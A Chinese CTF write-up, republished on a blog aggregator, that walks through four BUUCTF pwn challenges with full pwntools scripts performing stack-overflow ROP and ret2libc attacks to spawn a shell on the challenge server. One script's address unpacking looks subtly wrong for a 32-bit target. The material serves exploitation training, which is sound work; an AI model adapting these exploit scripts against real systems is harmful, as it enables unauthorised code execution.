buuctf pwn(13~16)

企业开发 2023-06-05 00:12:05 阅读次数: 0

[OGeek2019]babyrop

32位elf文件,放进32位ida,先看一下逻辑,和漏洞点
main函数:
在这里插入图片描述
/dev/urandom这个目录是生成随机数的
然后就是下面的函数的了,sub_804871F
在这里插入图片描述
也不存在漏洞,那再看下面的函数sub_80487D0
在这里插入图片描述
在这里插入图片描述
所以应该让a1足够大,能够完成栈溢出
a1又和v2有关系v2=a2[7],a2是我们输入的数据
所以漏洞点就找到了。
但是有一点需要注意一下
在这里插入图片描述
这个地方会比较两个数据,所以我们让v1等于0,即通过\x00来绕过strlen的长度检测,这样就是比较他们的前0位肯定是相等的。

再checksec一下
在这里插入图片描述
没有找到system函数和/bin/sh字符串
而且给了一个libc-2.23.so文件
所以这个题应该就是经典32位retlibc题了
脚本如下:

from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
p=remote("node4.buuoj.cn",29035)

elf=ELF("./pwn13")
libc=ELF("./libc-2.23.so")

ret=0x08048502
main=0x08048825

write_plt=elf.plt['write']
read_got=elf.got['read']

pay=b'\x00'+b'\xff'*0x18  #\x表示的十六进制,意思就是16进制的ff
p.sendline(pay)
p.recvuntil("Correct\n")
payload=b'a'*(0xe7+4)+p32(write_plt)+p32(main)+p32(1)+p32(read_got)+p32(4)
p.sendline(payload)
read_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(read_addr))

libc_base=read_addr-libc.sym['read']
sys=libc.sym['system']+libc_base
bin=libc_base+libc.search(b"/bin/sh").__next__()

pay=b'\x00'+b'\xff'*0x18
p.sendline(pay)
p.recvuntil("Correct\n")
payload=b'a'*(0xe7+4)+p32(sys)+p32(ret)+p32(bin)
p.sendline(payload)

p.interactive()

在这里插入图片描述

jarvisoj_level2_x64

64位elf文件,放进64位ida里看一下主体逻辑
在这里插入图片描述
在这里插入图片描述
有system函数而且还有个溢出点,shift+f12看一眼有没有/bin/sh字符串
在这里插入图片描述
有的话,需要一个pop rdi ret
再checksec一下
在这里插入图片描述

然后直接system
构造rop

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node4.buuoj.cn",26205)
#p=process("./pwn14")
sys=0x4004C0
bin=0x600A90
ret=0x00000000004004a1
pop=0x00000000004006b3
payload=b'a'*(0x80+8)+p64(pop)+p64(bin)+p64(ret)+p64(sys)
p.sendline(payload)
p.interactive()

在这里插入图片描述

[HarekazeCTF2019]baby_rop

64位elf文件,丢进64位ida里面
在这里插入图片描述
发现一个溢出点,而且有system函数,再看一下有没有/bin/sh
在这里插入图片描述
再checksec一下
在这里插入图片描述

那这个题和上面的几乎一样了
构造rop

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node4.buuoj.cn",27033)
#p=process("./pwn14")
sys=0x400490
bin=0x601048
ret=0x0000000000400479
pop=0x0000000000400683
payload=b'a'*(0x10+8)+p64(pop)+p64(bin)+p64(ret)+p64(sys)
p.sendline(payload)
p.interactive()

在这里插入图片描述

ciscn_2019_en_2

这个题之前发过了,一摸一样,经典retlibc
64位题
下面是我之前写过的:
https://blog.csdn.net/cainiao78777/article/details/127988372?spm=1001.2014.3001.5501

猜你喜欢

转载自blog.csdn.net/cainiao78777/article/details/128418563
今日推荐
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
周排行
浏览器对同一域名进行请求的最大并发连接数
React Hook之自定义Hook
【转】MyBatis缓存机制
-Java-泛型
自动化测试常用脚本-发送邮件
LeetCode#859: Buddy Strings
java、Python处理字符串
第二篇の博客
Hadoop伪分布式环境安装
SQL Server进阶(十一)临时表、表变量
每日归档
更多
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022